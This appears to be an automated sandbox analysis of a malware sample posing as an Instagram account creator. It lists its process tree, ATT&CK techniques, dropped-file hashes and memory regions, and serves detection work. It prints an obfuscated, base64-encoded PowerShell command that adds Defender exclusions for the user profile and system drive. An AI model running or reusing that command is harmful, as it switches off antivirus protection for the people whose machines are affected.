- Creates scheduled task(s)
PID:316

C:\Windows\system32\taskeng.exe
taskeng.exe {9B428CC5-6C7C-4E97-AC6B-67AF84AAF1B4} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1524

C:\Program Files\Vision Applications\Vision.exe
"C:\Program Files\Vision Applications\Vision.exe"
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAagAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAZABpAGMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcwB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAYgB3AGkAIwA+AA=="
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Vision Applications\Vision.exe

Filesize
4.1MB

MD5
f10d390a8895f0a1cf5ade031ac1b5e0

SHA1
55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

SHA256
b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

SHA512
a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

Download Submit
C:\Program Files\Vision Applications\Vision.exe

Filesize
4.1MB

MD5
f10d390a8895f0a1cf5ade031ac1b5e0

SHA1
55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

SHA256
b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

SHA512
a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp84EA.tmp.bat

Filesize
57B

MD5
53364ab2e4f9d4d2479294e8024bcdbd

SHA1
ee97a06756eec4f9276ac7de1ee74c01933521b4

SHA256
c2164e07e81d773b9a1053b9bd3c0aa81112493e7aa8e0c260b28f80ed7672d4

SHA512
f292be80be9c9139f378e0724a8a0ea026339772d7e32d39835eaaf6ff530746bef420500b3e43471adb5ce94dbc5d17dcab30b784a0715fe973a7f2b80a15ce

Download Submit
C:\Users\Admin\AppData\Roaming\Blitz Services.exe

Filesize
111KB

MD5
85f5505d0e69f945ce24fb6424256d87

SHA1
f0add1c0c5d02fc937e189be93930fb0c448bbf7

SHA256
b72817365f429401432afbdca8157c84a066a7d4ff7605657325b9a0a3c667f2

SHA512
5484fcfc2ddb92dc38281092a6378c48e980db738f49467fd499b86ff14d97df8c16b4bc1cfb7a57ce54781e3b5e805b274f8afbac0fa6d0a63c6f4cc6a0f00c

Download Submit
C:\Users\Admin\AppData\Roaming\Blitz Services.exe

Filesize
111KB

MD5
85f5505d0e69f945ce24fb6424256d87

SHA1
f0add1c0c5d02fc937e189be93930fb0c448bbf7

SHA256
b72817365f429401432afbdca8157c84a066a7d4ff7605657325b9a0a3c667f2

SHA512
5484fcfc2ddb92dc38281092a6378c48e980db738f49467fd499b86ff14d97df8c16b4bc1cfb7a57ce54781e3b5e805b274f8afbac0fa6d0a63c6f4cc6a0f00c

Download Submit
C:\Users\Admin\AppData\Roaming\Client.exe

Filesize
4.1MB

MD5
f10d390a8895f0a1cf5ade031ac1b5e0

SHA1
55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

SHA256
b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

SHA512
a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

Download Submit
C:\Users\Admin\AppData\Roaming\Client.exe

Filesize
4.1MB

MD5
f10d390a8895f0a1cf5ade031ac1b5e0

SHA1
55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

SHA256
b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

SHA512
a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

Download Submit
C:\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe

Filesize
44.1MB

MD5
8bf798c11748118b07087393c2697fc8

SHA1
448994eb8e13e31829100c1dfedca20e16bec0e0

SHA256
d3290c2fb0ba5348a5ad1b17a9ec6e0511d79f59c905450bc039bcf3797a3d89

SHA512
d0496e10ff5bc2a3368ce517e66d16d03eece92e1d39ff4e07f220d95d049d811294561e72b7828785bf89c0cfab15f28f6c61eaf1f5226574d494074d59483c

Download Submit
C:\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe

Filesize
44.1MB

MD5
8bf798c11748118b07087393c2697fc8

SHA1
448994eb8e13e31829100c1dfedca20e16bec0e0

SHA256
d3290c2fb0ba5348a5ad1b17a9ec6e0511d79f59c905450bc039bcf3797a3d89

SHA512
d0496e10ff5bc2a3368ce517e66d16d03eece92e1d39ff4e07f220d95d049d811294561e72b7828785bf89c0cfab15f28f6c61eaf1f5226574d494074d59483c

Download Submit
C:\Users\Admin\AppData\Roaming\Loader.exe

Filesize
6.0MB

MD5
85a0cae06cf6fe7a4dde5658d881a787

SHA1
b64b42bedb00d723d883b37137dd5443302c5c97

SHA256
311418cad3d35fa5fa39179252ee4afde41f0f3a91dbc2dbf214c9eb6b2dc6f7

SHA512
dce9c385868abc9f066d74f5b72d51c7aed9123e972fa01abd66f5b6b56fd4d1618ca3d352be97c94db0309e495e9cd8848da4b179bdbedac81928afe23f2b8b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6e98a2a22422c9c71471786692c46aca

SHA1
d5e0daa0a352db55a0df3955a5c522f5a0c8780d

SHA256
6689e2dfbcc5b5fb72b7f155cb1c59ce78e01f6e3f33ad4fbbf450a95ce05758

SHA512
7c2c334f28344b57e46ea373e561d8a78069a7023ac92c55e5a5619f3023378db00e60f72d5af16b00f9827a3b5d2fac52a1ef1e4d2b61a44e52039ed63df5d5

Download Submit
C:\Users\Admin\AppData\Roaming\Strike.exe

Filesize
224KB

MD5
fa6143b7805667a5ae710b233696e662

SHA1
eca95b36a2e5ce51d2ac4d15d54f9bee2096e79f

SHA256
600287396c9325a05c80f5feb44c91f12e8453ace60dccb3599a9c338b2082ed

SHA512
cce88b0402e959e85a5d5114e25173636dd983d1031cf0f27ce6cb1549f9ebe9ade7a5a21fa09c7d10ad13a1814da10346cf49753a3c78e3d5bfd7feb8630c82

Download Submit
C:\Users\Admin\AppData\Roaming\Strike.exe

Filesize
224KB

MD5
fa6143b7805667a5ae710b233696e662

SHA1
eca95b36a2e5ce51d2ac4d15d54f9bee2096e79f

SHA256
600287396c9325a05c80f5feb44c91f12e8453ace60dccb3599a9c338b2082ed

SHA512
cce88b0402e959e85a5d5114e25173636dd983d1031cf0f27ce6cb1549f9ebe9ade7a5a21fa09c7d10ad13a1814da10346cf49753a3c78e3d5bfd7feb8630c82

Download Submit
C:\Users\Admin\AppData\Roaming\build.exe

Filesize
1.5MB

MD5
48ccd08c79467acff8cd53f889c481c3

SHA1
123bfa1980f512e186351cc20f35c7c87df67455

SHA256
d853dc258931060e328519cc2055ebc124f0a4ee4c88f1b3045f18dc53ba7c16

SHA512
415265d6a597d1aadef4c79e734c125464c7bf52b28fc58a0a9cab331821cead0d5d0372d21252c6dabfee13b727c84149a8e32e545e5f14b7ff74c786a41b25

Download Submit
C:\Users\Admin\AppData\Roaming\build.exe

Filesize
1.5MB

MD5
48ccd08c79467acff8cd53f889c481c3

SHA1
123bfa1980f512e186351cc20f35c7c87df67455

SHA256
d853dc258931060e328519cc2055ebc124f0a4ee4c88f1b3045f18dc53ba7c16

SHA512
415265d6a597d1aadef4c79e734c125464c7bf52b28fc58a0a9cab331821cead0d5d0372d21252c6dabfee13b727c84149a8e32e545e5f14b7ff74c786a41b25

Download Submit
\Program Files\Vision Applications\Vision.exe

Filesize
4.1MB

MD5
f10d390a8895f0a1cf5ade031ac1b5e0

SHA1
55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

SHA256
b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

SHA512
a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

Download Submit
\Users\Admin\AppData\Roaming\Blitz Services.exe

Filesize
111KB

MD5
85f5505d0e69f945ce24fb6424256d87

SHA1
f0add1c0c5d02fc937e189be93930fb0c448bbf7

SHA256
b72817365f429401432afbdca8157c84a066a7d4ff7605657325b9a0a3c667f2

SHA512
5484fcfc2ddb92dc38281092a6378c48e980db738f49467fd499b86ff14d97df8c16b4bc1cfb7a57ce54781e3b5e805b274f8afbac0fa6d0a63c6f4cc6a0f00c

Download Submit
\Users\Admin\AppData\Roaming\Client.exe

Filesize
4.1MB

MD5
f10d390a8895f0a1cf5ade031ac1b5e0

SHA1
55a3ce51ba8256f5f5a2c0a2248ed14a056ee84a

SHA256
b49677ccfa815f8d0793d642145ee0e83dcc7f0f0d7b9acf76744dfaacd4aead

SHA512
a7802f9b586e71417cda8f5953d8e0eeed773730bb458cb87a890f181f950e0a8923a0aaf4b3aaed6bbe4f19148d7a37f377ee6d39a9e60e1e257de4a4881e84

Download Submit
\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe

Filesize
44.1MB

MD5
8bf798c11748118b07087393c2697fc8

SHA1
448994eb8e13e31829100c1dfedca20e16bec0e0

SHA256
d3290c2fb0ba5348a5ad1b17a9ec6e0511d79f59c905450bc039bcf3797a3d89

SHA512
d0496e10ff5bc2a3368ce517e66d16d03eece92e1d39ff4e07f220d95d049d811294561e72b7828785bf89c0cfab15f28f6c61eaf1f5226574d494074d59483c

Download Submit
\Users\Admin\AppData\Roaming\Loader.exe

Filesize
6.0MB

MD5
85a0cae06cf6fe7a4dde5658d881a787

SHA1
b64b42bedb00d723d883b37137dd5443302c5c97

SHA256
311418cad3d35fa5fa39179252ee4afde41f0f3a91dbc2dbf214c9eb6b2dc6f7

SHA512
dce9c385868abc9f066d74f5b72d51c7aed9123e972fa01abd66f5b6b56fd4d1618ca3d352be97c94db0309e495e9cd8848da4b179bdbedac81928afe23f2b8b

Download Submit
\Users\Admin\AppData\Roaming\Strike.exe

Filesize
224KB

MD5
fa6143b7805667a5ae710b233696e662

SHA1
eca95b36a2e5ce51d2ac4d15d54f9bee2096e79f

SHA256
600287396c9325a05c80f5feb44c91f12e8453ace60dccb3599a9c338b2082ed

SHA512
cce88b0402e959e85a5d5114e25173636dd983d1031cf0f27ce6cb1549f9ebe9ade7a5a21fa09c7d10ad13a1814da10346cf49753a3c78e3d5bfd7feb8630c82

Download Submit
\Users\Admin\AppData\Roaming\build.exe

Filesize
1.5MB

MD5
48ccd08c79467acff8cd53f889c481c3

SHA1
123bfa1980f512e186351cc20f35c7c87df67455

SHA256
d853dc258931060e328519cc2055ebc124f0a4ee4c88f1b3045f18dc53ba7c16

SHA512
415265d6a597d1aadef4c79e734c125464c7bf52b28fc58a0a9cab331821cead0d5d0372d21252c6dabfee13b727c84149a8e32e545e5f14b7ff74c786a41b25

Download Submit
memory/316-127-0x0000000000000000-mapping.dmp

Download
memory/520-144-0x0000000000000000-mapping.dmp

Download
memory/580-177-0x0000000000000000-mapping.dmp

Download
memory/604-108-0x0000000000BC0000-0x0000000000BFE000-memory.dmp

Filesize
248KB

Download
memory/604-79-0x0000000000000000-mapping.dmp

Download
memory/604-112-0x0000000004880000-0x00000000048F8000-memory.dmp

Filesize
480KB

Download
memory/604-117-0x0000000000670000-0x0000000000678000-memory.dmp

Filesize
32KB

Download
memory/632-142-0x0000000000000000-mapping.dmp

Download
memory/664-118-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp

Filesize
8KB

Download
memory/664-71-0x0000000000000000-mapping.dmp

Download
memory/664-106-0x000000013F1C0000-0x000000013F5E8000-memory.dmp

Filesize
4.2MB

Download
memory/684-156-0x0000000000000000-mapping.dmp

Download
memory/700-146-0x0000000000000000-mapping.dmp

Download
memory/828-64-0x0000000000000000-mapping.dmp

Download
memory/848-157-0x0000000000000000-mapping.dmp

Download
memory/864-137-0x0000000000000000-mapping.dmp

Download
memory/868-138-0x0000000000000000-mapping.dmp

Download
memory/912-150-0x0000000000000000-mapping.dmp

Download
memory/920-139-0x00000000736B0000-0x0000000073C5B000-memory.dmp

Filesize
5.7MB

Download
memory/920-67-0x0000000000000000-mapping.dmp

Download
memory/920-122-0x00000000736B0000-0x0000000073C5B000-memory.dmp

Filesize
5.7MB

Download
memory/920-110-0x00000000736B0000-0x0000000073C5B000-memory.dmp

Filesize
5.7MB

Download
memory/952-121-0x000007FEEC3E0000-0x000007FEECE03000-memory.dmp

Filesize
10.1MB

Download
memory/952-129-0x0000000002864000-0x0000000002867000-memory.dmp

Filesize
12KB

Download
memory/952-119-0x0000000000000000-mapping.dmp

Download
memory/952-133-0x000000000286B000-0x000000000288A000-memory.dmp

Filesize
124KB

Download
memory/952-132-0x0000000002864000-0x0000000002867000-memory.dmp

Filesize
12KB

Download
memory/952-131-0x000000000286B000-0x000000000288A000-memory.dmp

Filesize
124KB

Download
memory/952-130-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/952-128-0x000007FEEB880000-0x000007FEEC3DD000-memory.dmp

Filesize
11.4MB

Download
memory/1104-143-0x0000000000000000-mapping.dmp

Download
memory/1256-54-0x0000000075C61000-0x0000000075C63000-memory.dmp

Filesize
8KB

Download
memory/1264-147-0x0000000000000000-mapping.dmp

Download
memory/1304-170-0x0000000000000000-mapping.dmp

Download
memory/1340-141-0x0000000000000000-mapping.dmp

Download
memory/1356-124-0x0000000000420000-0x0000000000456000-memory.dmp

Filesize
216KB

Download
memory/1356-179-0x0000000000000000-mapping.dmp

Download
memory/1356-125-0x00000000008B0000-0x00000000008B8000-memory.dmp

Filesize
32KB

Download
memory/1356-84-0x0000000000000000-mapping.dmp

Download
memory/1356-107-0x00000000008D0000-0x00000000008F2000-memory.dmp

Filesize
136KB

Download
memory/1432-171-0x0000000000000000-mapping.dmp

Download
memory/1508-178-0x0000000000000000-mapping.dmp

Download
memory/1532-83-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1532-90-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1532-58-0x0000000000000000-mapping.dmp

Download
memory/1532-76-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1532-80-0x0000000074A60000-0x0000000074B70000-memory.dmp

Filesize
1.1MB

Download
memory/1532-116-0x0000000074A60000-0x0000000074B70000-memory.dmp

Filesize
1.1MB

Download
memory/1532-115-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1532-85-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1532-88-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1532-102-0x0000000003F80000-0x0000000004AFC000-memory.dmp

Filesize
11.5MB

Download
memory/1532-87-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1532-101-0x0000000010000000-0x000000001006A000-memory.dmp

Filesize
424KB

Download
memory/1532-96-0x0000000010000000-0x000000001006A000-memory.dmp

Filesize
424KB

Download
memory/1532-89-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1532-93-0x0000000000890000-0x0000000000BD9000-memory.dmp

Filesize
3.3MB

Download
memory/1560-180-0x0000000000000000-mapping.dmp

Download
memory/1612-153-0x0000000000000000-mapping.dmp

Download
memory/1620-155-0x0000000000000000-mapping.dmp

Download
memory/1640-148-0x0000000000000000-mapping.dmp

Download
memory/1680-145-0x0000000000000000-mapping.dmp

Download
memory/1704-152-0x0000000000000000-mapping.dmp

Download
memory/1728-174-0x0000000000000000-mapping.dmp

Download
memory/1760-176-0x0000000000000000-mapping.dmp

Download
memory/1764-154-0x0000000000000000-mapping.dmp

Download
memory/1776-159-0x0000000000000000-mapping.dmp

Download
memory/1776-162-0x000000013FF80000-0x00000001403A8000-memory.dmp

Filesize
4.2MB

Download
memory/1780-164-0x0000000000000000-mapping.dmp

Download
memory/1780-166-0x000007FEEB3E0000-0x000007FEEBE03000-memory.dmp

Filesize
10.1MB

Download
memory/1780-167-0x000007FEEA880000-0x000007FEEB3DD000-memory.dmp

Filesize
11.4MB

Download
memory/1780-168-0x00000000010F4000-0x00000000010F7000-memory.dmp

Filesize
12KB

Download
memory/1780-169-0x00000000010FB000-0x000000000111A000-memory.dmp

Filesize
124KB

Download
memory/1804-109-0x0000000000C60000-0x0000000000DE4000-memory.dmp

Filesize
1.5MB

Download
memory/1804-75-0x0000000000000000-mapping.dmp

Download
memory/1836-151-0x0000000000000000-mapping.dmp

Download
memory/1852-172-0x0000000000000000-mapping.dmp

Download
memory/1856-173-0x0000000000000000-mapping.dmp

Download
memory/1856-136-0x0000000000000000-mapping.dmp

Download
memory/1880-134-0x0000000000000000-mapping.dmp

Download
memory/1956-140-0x00000000736B0000-0x0000000073C5B000-memory.dmp

Filesize
5.7MB

Download
memory/1956-111-0x00000000736B0000-0x0000000073C5B000-memory.dmp

Filesize
5.7MB

Download
memory/1956-123-0x00000000736B0000-0x0000000073C5B000-memory.dmp

Filesize
5.7MB

Download
memory/1956-55-0x0000000000000000-mapping.dmp

Download
memory/1960-175-0x0000000000000000-mapping.dmp

Download
memory/1992-149-0x0000000000000000-mapping.dmp

Download